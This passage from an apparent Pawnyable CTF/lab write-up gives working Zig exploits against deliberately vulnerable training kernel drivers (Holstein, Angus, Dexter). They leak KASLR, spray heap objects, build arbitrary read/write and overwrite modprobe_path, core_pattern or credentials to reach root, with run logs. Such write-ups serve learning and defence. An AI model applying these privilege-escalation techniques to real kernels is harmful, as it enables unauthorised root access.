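    // Same value as std.mem.readInt(u64, "/tmp/x\x00\x00", .little) in the chain.
    std.debug.print("0x{x:0>16}\n", .{pack8("/tmp/x")});
}
```

The zero padding doubles as the string terminator, so a single 8-byte store is enough to replace `/sbin/modprobe` with `/tmp/x`.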
       
       I ran into the segfault problem again, so I used `sigaction` once more.
       <<pawnyable-lib>>
       <<tty_struct>>
       <<heap-spray>>
       <<lk01-2-heap-leak>>
       <<lk01-2-heap-overflow>>
       <<lk01-2-rop>>
       
       pub fn main() !void {
           catchSigsegv(&modprobePath);
           saveState();
       
           var ttys: [100]posix.fd_t = undefined;
           defer for (ttys) |tty| posix.close(tty);
           try spray(ttys[0..50]);
       
           const fd = try posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           try spray(ttys[50..]);
       
           const kaslr_offset = try leakKASLROffset(fd);
           std.log.info("Kernel base: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&(kaslr_offset+0xffffffff81000000))), .lower)});
           adjust_offsets(kaslr_offset);
       
           const g_buf = try leakGBuf(fd);
           std.log.info("g_buf located at: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&g_buf)), .lower)});
       
           try posionTTYStruct(fd, g_buf);
           const ropchain_addr = g_buf + @sizeOf(tty_operations);
       
           var buf: [10]u8 = undefined;
           _ = try posix.read(fd, &buf);
       
           for (ttys) |tty| _ = linux.ioctl(tty, 0xdeadbeef, ropchain_addr);
       }
       whoami
       ./exploit
       # execute bogus file
       /tmp/unknown &> /tmp/null # /dev/null is privileged
       cat /tmp/whoisit
       whoami: unknown uid 1337
       [INFO] Kernel base: 0xffffffffa0800000
       [INFO] g_buf located at: 0xffff9f45c3108000
       [INFO] You won!!
       root
       
 (DIR) Full exploit
       
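       Actually, the stack pivot was unnecessary: using an AAW gadget gives the same result.

       Other methods

       Overwriting core_pattern [4]
       When a core dump occurs, the program defined in `core_pattern` is invoked (if the pattern starts with `|`). `core_pattern` is apparently not affected by FGKASLR, which makes it especially handy.

        Reading and writing `task_struct.cred`
       With AAR and AAW, we can find `task_struct.cred` on the heap and zero the IDs in it (using `prctl` to change the process name to an easily searchable value makes the search easier).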
       
       === v3: Use after Free
       
       10c10
       < MODULE_DESCRIPTION("Holstein v2 - Vulnerable Kernel Driver for Pawnyable");
       ---
       > MODULE_DESCRIPTION("Holstein v3 - Vulnerable Kernel Driver for Pawnyable");
       21c21
       <   g_buf = kmalloc(BUFFER_SIZE, GFP_KERNEL);
       ---
       >   g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
       35a36,40
       >   if (count > BUFFER_SIZE) {
       >     printk(KERN_INFO "invalid buffer size\n");
       >     return -EINVAL;
       >   }
       >
       48a54,58
       >
       >   if (count > BUFFER_SIZE) {
       >     printk(KERN_INFO "invalid buffer size\n");
       >     return -EINVAL;
       >   }
       
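       This time there is no overflow. Let's abuse the UAF on `g_buf` instead.

       The plan of attack:

       1.  Open `/dev/holstein` twice
       2.  Close one of the fds
       3.  Spray multiple `tty_struct`s
       4.  Overwrite one of the structures through the other fd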
       from pwn import *
       vmlinux = ELF("./vmlinux")
       hex(next(vmlinux.search(b"core".ljust(128, b"\0"))))
       0xffffffff81eb12e0
       <<pawnyable-lib>>
       <<tty_struct>>
       <<heap-spray>>
       
       var MOV_ADDROF_RDX_RCX: u64 = 0xffffffff811b2d06;
       var CORE_PATTERN: u64 = 0xffffffff81eb12e0;
       
       fn leakKASLROffset(fd: posix.fd_t) !u64 {
           const ptmx_fops_addr = 0xffffffff81c39c60;
           var buf: [@offsetOf(tty_struct, "ops")+@sizeOf(@FieldType(tty_struct, "ops"))]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - ptmx_fops_addr;
       }
       
       fn leakHeap(fd: posix.fd_t) !u64 {
           const offset = comptime blk: {
               const ld_semaphore = @FieldType(tty_struct, "ldisc_sem");
               break :blk @offsetOf(tty_struct, "ldisc_sem") + @offsetOf(ld_semaphore, "read_wait") + @sizeOf(@typeInfo(@FieldType(ld_semaphore, "read_wait")).@"struct".fields[0].type);
           };
           var buf: [offset]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - (buf.len-8);
       }
       
       fn aaw(fd: posix.fd_t, ttys: []posix.fd_t, g_buf_addr: u64, value: u32, address: u64) !void {
           _ = try posix.write(fd, std.mem.asBytes(&tty_struct{ .driver = g_buf_addr, .ops = g_buf_addr + @sizeOf(tty_struct), .ldisc_sem = .{ .read_wait = .{ .next = g_buf_addr...
           for (ttys) |tty| if (.SUCCESS == posix.errno(linux.ioctl(tty, value, address))) break;
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &MOV_ADDROF_RDX_RCX,
               &CORE_PATTERN,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
       
       pub fn main() !void {
           catchSigsegv(&corePattern);
           saveState();
       
           const fd = try posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
           const fd2 = try posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           posix.close(fd2);
       
           var ttys: [100]posix.fd_t = undefined;
           defer for (ttys) |tty| posix.close(tty);
           try spray(ttys[0..]);
       
           const kaslr_offset = try leakKASLROffset(fd);
           std.log.info("Kernel base: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&(kaslr_offset+0xffffffff81000000))), .lower)});
           adjust_offsets(kaslr_offset);
       
           const g_buf_addr = try leakHeap(fd);
           try aaw(fd, &ttys, g_buf_addr, std.mem.readInt(u32, "|/tm", .little), CORE_PATTERN);
           try aaw(fd, &ttys, g_buf_addr, std.mem.readInt(u32, "p/x\x00", .little), CORE_PATTERN+0x4);
       
           corePattern();
       }
       whoami: unknown uid 1337
       [INFO] Kernel base: 0xffffffffb0c00000
       [INFO] You won!!
       root
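
The two `aaw` calls in `main` write the new pattern four bytes at a time, since the `ioctl` command value is only 32 bits wide. The sketch below shows how the 8-byte payload `|/tmp/x\0` splits into those writes. `Write` and `planWrites` are hypothetical names, and the base address is the static `core_pattern` address found with pwntools above, before KASLR adjustment.

```zig
const std = @import("std");

const Write = struct { address: u64, value: u32 };

/// Splits `payload` into `n` consecutive 32-bit little-endian writes starting at `base`.
fn planWrites(comptime n: usize, payload: *const [n * 4]u8, base: u64) [n]Write {
    var out: [n]Write = undefined;
    var addr = base;
    for (&out, 0..) |*w, i| {
        w.* = .{
            .address = addr,
            .value = std.mem.readInt(u32, payload[i * 4 ..][0..4], .little),
        };
        addr += 4;
    }
    return out;
}

pub fn main() void {
    // "|/tmp/x" plus its NUL terminator is exactly eight bytes.
    const writes = planWrites(2, "|/tmp/x\x00", 0xffffffff81eb12e0);
    for (writes) |w| {
        std.debug.print("0x{x} <- 0x{x:0>8}\n", .{ w.address, w.value });
    }
}
```

Each entry corresponds to one `aaw(fd, &ttys, g_buf_addr, value, address)` call in the exploit.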
       
 (DIR) Full exploit
       
       === v4: Race Condition
       
       10c10
       < MODULE_DESCRIPTION("Holstein v3 - Vulnerable Kernel Driver for Pawnyable");
       ---
       > MODULE_DESCRIPTION("Holstein v4 - Vulnerable Kernel Driver for Pawnyable");
       14a15
       > int mutex = 0;
       20a22,27
       >   if (mutex) {
       >     printk(KERN_INFO "resource is busy");
       >     return -EBUSY;
       >   }
       >   mutex = 1;
       >
       71a79
       >   mutex = 0;
       
       This introduces a TOCTOU bug: the check and the update of `mutex` are not atomic.
       For the UAF to succeed, two threads must both get past `if (mutex)`, and then one of them must close its fd.
       <<pin-to-core>>
       
       var master_fd: ?posix.fd_t = null;
       fn race_master(slave_sync: *std.Thread.ResetEvent, master_sync: *std.Thread.ResetEvent) void {
           while (true) {
               std.Thread.sleep(2);
               if (posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660)) |mfd| {
                   slave_sync.wait();
                   slave_sync.reset();
                   if (slave_fd) |_| {
                       master_fd = mfd;
                       master_sync.set();
                       break;
                   }
                   posix.close(mfd);
               } else |err| switch (err) {
                   error.DeviceBusy => {
                       slave_sync.wait();
                       slave_sync.reset();
                   },
                   else => unreachable,
               }
               master_sync.set(); // resume execution of slave
           }
       }
       
       var slave_fd: ?posix.fd_t = null;
       fn race_slave(slave_sync: *std.Thread.ResetEvent, master_sync: *std.Thread.ResetEvent) void {
           while (true) {
               std.Thread.sleep(2);
               if (posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660)) |sfd| {
                   slave_fd = sfd;
                   slave_sync.set();
                   master_sync.wait(); // sleep and let master resume execution
                   master_sync.reset();
                   posix.close(sfd);
                   slave_fd = null;
                   if (master_fd) |_| break;
               } else |err| switch (err) {
                   error.DeviceBusy => {
                       slave_sync.set();
                       master_sync.wait(); // sleep and let master resume execution
                       master_sync.reset();
                   },
                   else => unreachable,
               }
           }
       }
       
       fn race() !posix.fd_t {
           std.debug.assert(try std.Thread.getCpuCount() > 1);
       
           var slave_sync = std.Thread.ResetEvent{};
           var master_sync = std.Thread.ResetEvent{};
           var t1 = try std.Thread.spawn(.{}, race_master, .{&slave_sync, &master_sync});
           var t2 = try std.Thread.spawn(.{}, race_slave, .{&slave_sync, &master_sync});
       
           try pinThreadToCore(t1.getHandle(), 0);
           try pinThreadToCore(t2.getHandle(), 1);
       
           t1.join();
           t2.join();
       
           std.log.info("Won the race", .{});
           defer master_fd = null;
           return master_fd.?;
       }
       [INFO] Won the race
       
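        There are subtle differences when heap spraying across multiple cores.
        The explanation below probably contains mistakes.

        When `g_buf` is freed (on core 1), the slab that holds `g_buf` is most likely the active slab of either core 0 or core 1, because it was freed right after being allocated.
        If `g_buf` was allocated on core 1, freeing it puts it on the lock-free freelist of core 1's active slab (this is separate from the slab's own freelist).
        So, to land a new structure in the hole left by `g_buf`, that structure has to be allocated from core 1.
        If `g_buf` was allocated on core 0 and freed on core 1, it is added to the active slab's own freelist instead.
        Whether we allocate on core 0 or on core 1, the result is the same. [^fn:5], [^fn:6]

        In short, we need to spray on both core 0 and core 1.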
       fn spray(dangling_fd: posix.fd_t, tty_fd: *?posix.fd_t) void {
           var fds: [100]posix.fd_t = undefined;
           var i: usize = 0;
           defer for (0..i) |j| posix.close(fds[j]);
           while (i < fds.len) : (i += 1) {
               fds[i] = posix.open("/dev/ptmx", .{ .ACCMODE = .RDONLY, .NOCTTY = true }, 0o660) catch return;
       
                // check if dangling_fd points to a tty_struct
               var buf =  [_]u8{0} ** @sizeOf(@FieldType(tty_struct, "magic"));
               _ = posix.read(dangling_fd, &buf) catch return;
               if (std.mem.eql(u8, &buf, std.mem.asBytes(&tty_struct{ .ops = undefined, .driver = undefined })[0..buf.len])) {
                   tty_fd.* = fds[i];
                   return;
               }
           }
       }
       
       fn getTty(fd: posix.fd_t) !posix.fd_t {
           return for (0..2) |cpu| {
               var ret: ?posix.fd_t = null;
               var t = try std.Thread.spawn(.{}, spray, .{fd, &ret});
               try pinThreadToCore(t.getHandle(), cpu);
               t.join();
               if (ret) |tty_fd| {
                   std.log.info("Heap spray succeeded on core {d}", .{cpu});
                   break tty_fd;
               } else {
                   std.log.warn("Heap spray failed on core {d}, retrying on {d}...", .{cpu, cpu+1});
               }
           } else error.SprayFailed;
       }
       [INFO] Won the race
       [INFO] Heap spray succeeded on core 0
       
        The rest of the attack is the same as in v3. This time, let's try writing to `task_struct`.
       <<pawnyable-lib>>
       <<lk01-4-race>>
       <<lk01-4-spray>>
       <<tty_struct>>
       
       var MOV_ADDROF_RDX_RCX: u64 = 0xffffffff811b72c6;
       var MOV_EAX_ADDROF_RDX: u64 = 0xffffffff8145e3a8;
       
       var aa_memoize: ?enum { read, write } = null;
       
       fn aaw(fd: posix.fd_t, tty: posix.fd_t, g_buf_addr: u64, value: u32, address: u64) !void {
           switch (aa_memoize orelse .read) {
               .write => {},
               else => {
                   _ = try posix.write(fd, std.mem.asBytes(&tty_struct.init(g_buf_addr + @sizeOf(tty_struct))) ++ std.mem.asBytes(&tty_operations{ .ioctl = MOV_ADDROF_RDX_RCX }));
                   aa_memoize = .write;
               },
           }
       
           switch (posix.errno(linux.ioctl(tty, value, address))) {
               .SUCCESS => {},
               else => return error.AAWFail,
           }
       }
       
       fn aar(fd: posix.fd_t, tty: posix.fd_t, g_buf_addr: u64, address: u64) !u32 {
           switch (aa_memoize orelse .write) {
               .read => {},
               else => {
                   _ = try posix.write(fd, std.mem.asBytes(&tty_struct.init(g_buf_addr + @sizeOf(tty_struct))) ++ std.mem.asBytes(&tty_operations{ .ioctl = MOV_EAX_ADDROF_RDX }));
                   aa_memoize = .read;
               },
           }
       
           // we hijack the return value of ioctl, so we can't check it for errors
           return @intCast(0xffffffff & linux.ioctl(tty, 0xdeadbeef, address));
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &MOV_ADDROF_RDX_RCX,
               &MOV_EAX_ADDROF_RDX,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
       
       fn leakKASLROffset(fd: posix.fd_t) !u64 {
           const ptmx_fops_addr: u64 = 0xffffffff81c3afe0;
       
           var buf: [@offsetOf(tty_struct, "ops")+@sizeOf(@FieldType(tty_struct, "ops"))]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - ptmx_fops_addr;
       }
       
       fn leakHeap(fd: posix.fd_t) !u64 {
           const offset = comptime blk: {
               const ld_semaphore = @FieldType(tty_struct, "ldisc_sem");
               break :blk @offsetOf(tty_struct, "ldisc_sem") + @offsetOf(ld_semaphore, "read_wait") + @sizeOf(@typeInfo(@FieldType(ld_semaphore, "read_wait")).@"struct".fields[0].type);
           };
           var buf: [offset]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - (buf.len-8);
       }
       
       pub fn main() !void {
           const fd = try race();
           const tty = try getTty(fd);
       
           const kaslr_offset = try leakKASLROffset(fd);
           std.log.info("Kernel base: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&(kaslr_offset+0xffffffff81000000))), .lower)});
           adjust_offsets(kaslr_offset);
       
           const g_buf = try leakHeap(fd);
       
           _ = try posix.prctl(.SET_NAME, .{@intFromPtr("okamikun"), 0, 0, 0});
       
           var addr: usize = g_buf - 0x1000000;
           const creds = while (addr < g_buf + 0x1000000) : (addr += 0x8) {
               if ((addr & 0xfffff) == 0)
                   std.debug.print("searching... 0x{s}\n", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&addr)), .lower)});
               if (std.mem.eql(u8, "okamikun", std.mem.sliceAsBytes(&[_]u32{try aar(fd, tty, g_buf, addr), try aar(fd, tty, g_buf, addr+0x4)}))) {
                   // task_struct is huge, I ain't copying that!
                   // just remember that `comm` comes immediately after `creds`.
                   break std.mem.readInt(u64, @ptrCast(std.mem.sliceAsBytes(&[_]u32{try aar(fd, tty, g_buf, addr-0x8), try aar(fd, tty, g_buf, (addr-0x8)+0x4)})), .little...
       
               }
           } else return error.HeapScanFailed;
       
           std.log.info("task_struct.creds = 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&creds)), .lower)});
       
           for (&[_]u64{@offsetOf(cred, "uid"), @offsetOf(cred, "euid")}) |offset|
               try aaw(fd, tty, g_buf, 0, creds+offset);
       
           whoami();
       }
       
       const cred = extern struct {
           usage: u32,
           uid: u32,
           gid: u32,
           suid: u32,
           sgid: u32,
           euid: u32,
           egid: u32,
           fsuid: u32,
           fsgid: u32,
       };
       whoami: unknown uid 1337
       [INFO] Won the race
       [INFO] Heap spray succeeded on core 0
       [INFO] Kernel base: 0xffffffff89400000
       searching... 0xffff89f501f00000
       searching... 0xffff89f502000000
       searching... 0xffff89f502100000
       searching... 0xffff89f502200000
       searching... 0xffff89f502300000
       searching... 0xffff89f502400000
       searching... 0xffff89f502500000
       searching... 0xffff89f502600000
       searching... 0xffff89f502700000
       searching... 0xffff89f502800000
       searching... 0xffff89f502900000
       searching... 0xffff89f502a00000
       searching... 0xffff89f502b00000
       searching... 0xffff89f502c00000
       searching... 0xffff89f502d00000
       searching... 0xffff89f502e00000
       searching... 0xffff89f502f00000
       searching... 0xffff89f503000000
       searching... 0xffff89f503100000
       searching... 0xffff89f503200000
       [INFO] task_struct.creds = 0xffff89f503363a00
       [INFO] You won!!
       root
       
  (DIR) Full exploit

        It's a bit flaky, but we escalated to root!
       
       == Angus
       
       
        Challenge info
       [*] './angus/qemu/rootfs/root/angus.ko'
           Arch:       amd64-64-little
           RELRO:      No RELRO
           Stack:      No canary found
           NX:         NX enabled
           PIE:        No PIE (0x0)
           Stripped:   No
       grep /proc/cpuinfo -q -e 'smep' && echo 'SMEP enabled'
       grep /proc/cpuinfo -q -e 'smap' && echo 'SMAP enabled'
       grep /sys/devices/system/cpu/vulnerabilities/meltdown -q -e 'PTI' && echo 'KPTI enabled'
       grep /proc/cmdline -q -e 'nokaslr' || echo 'KASLR enabled'
       SMEP enabled
       KPTI enabled
       KASLR enabled
       ffffffffb8c00000 T startup_64
       ffffffffb8c00040 T secondary_startup_64
       ffffffffb8c00045 T secondary_startup_64_no_verify
       ffffffffb8c00240 T __startup_64
       ffffffffb8c005f0 T startup_64_setup_env
       ffffffffb8c72810 T commit_creds
       ffffffffb8c729b0 T prepare_kernel_cred
       ffffffffb9400e10 T swapgs_restore_regs_and_return_to_usermode
       
        Well, this challenge is pretty straightforward.
       const angus_ioctl = enum(u32) {
           INIT    = 0x13370001,
           SETKEY  = 0x13370002,
           SETDATA = 0x13370003,
           GETDATA = 0x13370004,
           ENCRYPT = 0x13370005,
           DECRYPT = 0x13370006,
       };
       
       const XorCipher = extern struct {
           key: [*]u8,
           data: [*]u8,
           keylen: usize,
           datalen: usize,
       };
       
       const request_t = extern struct {
           ptr: [*]u8,
           len: usize,
       };
       
       var zero_page: ?*allowzero XorCipher = null;
       fn mmap_null() !*allowzero XorCipher {
           if (zero_page) |ret| {
               return ret;
           } else {
               const rc = linux.mmap(
                   null,
                   std.heap.page_size_min,
                   linux.PROT.READ | linux.PROT.WRITE,
                   posix.MAP{
                       .TYPE = .PRIVATE,
                       .FIXED = true,
                       .ANONYMOUS = true,
                       .POPULATE = true,
                   },
                   -1,
                   0,
               );
               switch (posix.errno(rc)) {
                   .SUCCESS => zero_page = @ptrFromInt(rc),
                   .TXTBSY => return error.AccessDenied,
                   .ACCES => return error.AccessDenied,
                   .PERM => return error.PermissionDenied,
                   .AGAIN => return error.LockedMemoryLimitExceeded,
                   .BADF => unreachable,
                   .OVERFLOW => unreachable,
                   .NODEV => return error.MemoryMappingNotSupported,
                   .INVAL => unreachable,
                   .MFILE => return error.ProcessFdQuotaExceeded,
                   .NFILE => return error.SystemFdQuotaExceeded,
                   .NOMEM => return error.OutOfMemory,
                   .EXIST => return error.MappingAlreadyExists,
                   else => |err| return posix.unexpectedErrno(err),
               }
               return zero_page.?;
           }
       }
       
       fn aaw(fd: posix.fd_t, buf: []const u8, addr: usize) !void {
           var target_value: [128]u8 = undefined;
           std.debug.assert(buf.len <= target_value.len);
           try aar(fd, target_value[0..buf.len], addr);
           for (0..buf.len) |i| target_value[i] ^= buf[i];
       
           const ctx = try mmap_null();
           ctx.* = .{
               .key = @as([*]u8, &target_value),
               .keylen = buf.len,
               .data = @as([*]u8, @ptrFromInt(addr)),
               .datalen = buf.len,
           };
       
           const err = linux.ioctl(fd, @intFromEnum(angus_ioctl.ENCRYPT), @intFromPtr(&request_t{ .ptr = @ptrFromInt(1), .len = 0 }));
           switch (posix.errno(err)) {
               .SUCCESS => {},
               else => return error.AAWFail,
           }
       }
       
       fn aar(fd: posix.fd_t, buf: []u8, addr: usize) !void {
           const ctx = try mmap_null();
           ctx.* = .{
               .key = @constCast(@ptrCast(&[_]u8{0})),
               .keylen = 1,
               .data = @as([*]u8, @ptrFromInt(addr)),
               .datalen = buf.len,
           };
       
           const err = linux.ioctl(fd, @intFromEnum(angus_ioctl.GETDATA), @intFromPtr(&request_t{ .ptr = @as([*]u8, @ptrCast(@constCast(buf))), .len = buf.len }));
           switch (posix.errno(err)) {
               .SUCCESS => {},
               else => return error.AARFail,
           }
       }
       <<pawnyable-lib>>
       <<lk02-types>>
       
       var MODPROBE_PATH: u64 = 0xffffffff81e37e60;
       
       pub fn main() !void {
           const fd = try posix.open("/dev/angus", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           var buf: [8]u8 = undefined;
       
           var kaddr: usize = 0xffffffff81000000;
           while (kaddr < 0xffffffff80000000+0x40000000) : (kaddr += 0x100000) {
               if (aar(fd, &buf, kaddr)) {
                   std.log.info("Kernel base address: 0x{x}", .{kaddr});
                   break;
               } else |_| {}
           } else return error.KBaseAddressScanFailed;
       
           MODPROBE_PATH += kaddr-0xffffffff81000000;
       
           try aaw(fd, "/tmp/x\x00", MODPROBE_PATH);
       
           modprobePath();
       }
       whoami
       ./exploit
       /tmp/unknown &> /tmp/null
       cat /tmp/whoisit
       whoami: unknown uid 1337
       [INFO] Kernel base address: 0xffffffffb3400000
       [INFO] You won!!
       root
       
  (DIR) Full exploit
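
The `aaw` primitive above works because XOR is its own inverse: if the key is `current ^ wanted`, then XORing the current bytes with it leaves `wanted`. Here is a small user-space sketch of that arithmetic. It only touches a local buffer, and `xorInPlace`, `keyFor` and `demo` are names invented for this example, not part of the driver or the exploit.

```zig
const std = @import("std");

/// XOR `data` in place with `key`, byte by byte (a stand-in for the driver's ENCRYPT).
fn xorInPlace(data: []u8, key: []const u8) void {
    for (data, 0..) |*byte, i| byte.* ^= key[i % key.len];
}

/// Compute the key that turns `current` into `wanted`: key = current ^ wanted.
fn keyFor(current: []const u8, wanted: []const u8, key_out: []u8) void {
    for (key_out, current, wanted) |*k, c, w| k.* = c ^ w;
}

/// Rewrites a local buffer the same way `aaw` rewrites kernel memory.
fn demo() [7]u8 {
    // stand-in for the bytes currently stored at the target address
    var memory = [_]u8{ '/', 's', 'b', 'i', 'n', '/', 'm' };
    const wanted = "/tmp/x\x00";
    var key: [wanted.len]u8 = undefined;
    keyFor(&memory, wanted, &key); // step 1: read the current bytes, derive the key
    xorInPlace(&memory, &key); // step 2: "encrypt" in place
    return memory;
}

pub fn main() void {
    const result = demo();
    std.debug.assert(std.mem.eql(u8, &result, "/tmp/x\x00"));
}
```

This is also why `aaw` has to call `aar` first: without knowing the current bytes there is no way to pick the right key.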
       
       == Dexter
       
       
        Challenge info
       [*] './dexter/qemu/rootfs/root/dexter.ko'
           Arch:       amd64-64-little
           RELRO:      No RELRO
           Stack:      No canary found
           NX:         NX enabled
           PIE:        No PIE (0x0)
           Stripped:   No
       SMEP enabled
       SMAP enabled
       KPTI enabled
       KASLR enabled
       
        The vulnerability in `dexter.c` is that `copy_data_from_user` is called twice, i.e. a double fetch.
        The attacker calls `ioctl` with a valid `request_t`.
        Then, right after `verify_request` has run, swapping the valid `request_t` for a malicious one gives a heap OOB read/write.
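
The pattern can be modeled in user space as follows. This is a sketch, not the module's code: `BUFFER_SIZE = 32` is an assumption made for illustration, `verifyRequest`, `lengthActuallyUsed` and `fetchOnce` are hypothetical names, and the racing write is replayed by hand between the two fetches so the result is deterministic.

```zig
const std = @import("std");

/// Assumed buffer size for illustration; the real value lives in `dexter.c`.
const BUFFER_SIZE: usize = 32;

/// Same field layout as the exploit's `request_t` (pointer, then length).
const Request = extern struct { ptr: usize, len: usize };

/// First fetch: copy the request out of "user memory" and validate the copy.
fn verifyRequest(user_req: *const volatile Request) bool {
    const req = user_req.*;
    return req.ptr != 0 and req.len <= BUFFER_SIZE;
}

/// Second fetch: copy the request again and return the length that gets used.
fn lengthActuallyUsed(user_req: *const volatile Request) usize {
    const req = user_req.*;
    return req.len;
}

/// Fixed variant: fetch once, validate that copy, and pass the same copy on.
fn fetchOnce(user_req: *const volatile Request) ?Request {
    const req = user_req.*;
    if (req.ptr == 0 or req.len > BUFFER_SIZE) return null;
    return req;
}

/// Replays the race by hand: the attacker's write lands between the two fetches.
fn replayDoubleFetch() usize {
    var shared = Request{ .ptr = 0x1000, .len = 8 };
    std.debug.assert(verifyRequest(&shared)); // passes with len = 8
    shared.len = 96; // the racing thread's write
    return lengthActuallyUsed(&shared);
}

pub fn main() void {
    std.debug.print("length used after verification: {d}\n", .{replayDoubleFetch()});
}
```

The verified length and the used length come from two different reads of the same user memory, so nothing ties them together.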
       
        So here's the plan:
       
        1.  Open `/dev/dexter`, which allocates `filp->private_data`
        2.  Spray `seq_operations`
        3.  Overwrite the `seq_operations.start` function pointer adjacent to `filp->private_data`
       
        If SMAP were disabled, that alone would be enough. But that would be boring, wouldn't it?
       
        First, defeat KASLR: the `ns` field of `shm_file_data` (another kmalloc-32 structure) holds a value at a fixed offset from the kernel base address.
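
As a worked example of that arithmetic: subtracting the non-KASLR address of `init_ipc_ns` from the leaked `ns` value gives the slide, and adding the slide to the default base gives the real kernel base. The constant is the one used in `main`; the leaked value below is a hypothetical one, back-computed so that it matches the kernel base printed in the log further down.

```zig
const std = @import("std");

const KERNEL_BASE_NOKASLR: u64 = 0xffffffff81000000;
const INIT_IPC_NS_NOKASLR: u64 = 0xffffffff81eb2c00; // same constant as in main

/// KASLR slide derived from a leaked `shm_file_data.ns` pointer.
fn kaslrOffset(leaked_ns: u64) u64 {
    return leaked_ns - INIT_IPC_NS_NOKASLR;
}

/// Randomized kernel base derived from the same leak.
fn kernelBase(leaked_ns: u64) u64 {
    return KERNEL_BASE_NOKASLR + kaslrOffset(leaked_ns);
}

pub fn main() void {
    // Hypothetical leak, chosen for illustration only.
    const leaked_ns: u64 = 0xffffffff8f2b2c00;
    std.debug.print("offset: 0x{x}\n", .{kaslrOffset(leaked_ns)});
    std.debug.print("base:   0x{x}\n", .{kernelBase(leaked_ns)});
}
```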
       
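        Now, where do we put the ROP chain?
        When a system call is executed, the user-space registers are saved on the kernel stack.
        If we load each gadget's address into a register, the kernel kindly places the ROP chain on the stack for us.
        It's a tight fit, but a ROP chain that overwrites `modprobe_path` does fit.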
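
For reference, this is the save area in question, written out as a Zig struct. The field order follows the x86-64 kernel's `struct pt_regs`; the comments about which slots are usable are my own reading, and `chain_room` is a name made up for this sketch.

```zig
const std = @import("std");

/// Field order of the x86-64 kernel's `struct pt_regs`, lowest address first.
const pt_regs = extern struct {
    r15: u64,
    r14: u64,
    r13: u64,
    r12: u64,
    bp: u64,
    bx: u64,
    r11: u64, // overwritten with RFLAGS by the `syscall` instruction
    r10: u64,
    r9: u64,
    r8: u64,
    ax: u64, // syscall number going in, return value coming out
    cx: u64, // overwritten with the return RIP by the `syscall` instruction
    dx: u64, // syscall argument 3
    si: u64, // syscall argument 2
    di: u64, // syscall argument 1
    orig_ax: u64,
    ip: u64,
    cs: u64,
    flags: u64,
    sp: u64,
    ss: u64,
};

comptime {
    std.debug.assert(@sizeOf(pt_regs) == 21 * @sizeOf(u64));
    std.debug.assert(@offsetOf(pt_regs, "r15") == 0x00);
    std.debug.assert(@offsetOf(pt_regs, "r11") == 0x30);
    std.debug.assert(@offsetOf(pt_regs, "r8") == 0x48);
}

/// Bytes spanned by the r15..r8 slots, i.e. the room a chain has before `ax`.
const chain_room = @offsetOf(pt_regs, "ax") - @offsetOf(pt_regs, "r15");

pub fn main() void {
    std.debug.print("chain room: {d} bytes ({d} slots)\n", .{ chain_room, chain_room / 8 });
}
```

Assuming the pivot's final `ret` lands on the r15 slot, which is what the register assignments in `ropchain` suggest, the chain reads like this: r15 holds the first gadget, its four pops consume r14, r13, r12 and bp, the next `ret` lands on bx, whose two pops skip over r11 and r10, and r9 and r8 supply the last two addresses. That is ten slots with one of them (r11) outside our control, hence the tight fit.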
       const dexter_ioctl = enum(u32) {
           GET = 0xdec50001,
           SET = 0xdec50002,
       };
       
       const request_t = extern struct {
           ptr: [*]u8,
           len: usize,
       };
       
       const seq_operations = extern struct {
           start: usize,
           stop: usize,
           next: usize,
           show: usize,
       };
       
       const shm_file_data = extern struct {
           id: i32,
           ns: usize,
           file: usize,
           vm_ops: usize,
       };
       <<pin-to-core>>
       
       fn raceIoctl(fd: posix.fd_t, buf: []u8, op: dexter_ioctl, req: *request_t, race_is_won: *bool) void {
           // read what's currently in filp->private_data.
           switch(posix.errno(linux.ioctl(fd, @intFromEnum(dexter_ioctl.GET), @intFromPtr(&request_t{ .ptr = @ptrCast(buf), .len = 8 })))) {
               .SUCCESS => {},
               else => unreachable,
           }
           var pd_sentinel: [8]u8 = undefined;
           @memcpy(&pd_sentinel, buf[0..8]);
           inline for (0..8) |i| buf[i] ^= 0xff;
       
           outer: while (true) {
               req.* = request_t{ .ptr = @ptrCast(buf), .len = 0 };
       
               std.Thread.yield() catch {};
               const err = linux.ioctl(fd, @intFromEnum(op), @intFromPtr(req));
       
               switch (posix.errno(err)) {
                   .SUCCESS => {
                       switch (op) {
                            // if we succeeded in reading, pd_sentinel is at the start of buf
                           .GET => {
                               if (std.mem.eql(u8, buf[0..8], &pd_sentinel)) break :outer;
                           },
                            // if we succeeded in writing, pd_sentinel should no longer be at the start of private_data
                           .SET => {
                               var tmp: [8]u8 = undefined;
                               switch(posix.errno(linux.ioctl(fd, @intFromEnum(dexter_ioctl.GET), @intFromPtr(&request_t{ .ptr = &tmp, .len = 8 })))) {
                                   .SUCCESS => {},
                                   else => unreachable,
                               }
                               if (!std.mem.eql(u8, tmp[0..8], &pd_sentinel)) break :outer;
                           },
                       }
                   },
                   .INVAL => continue,
                   else => {},
               }
           }
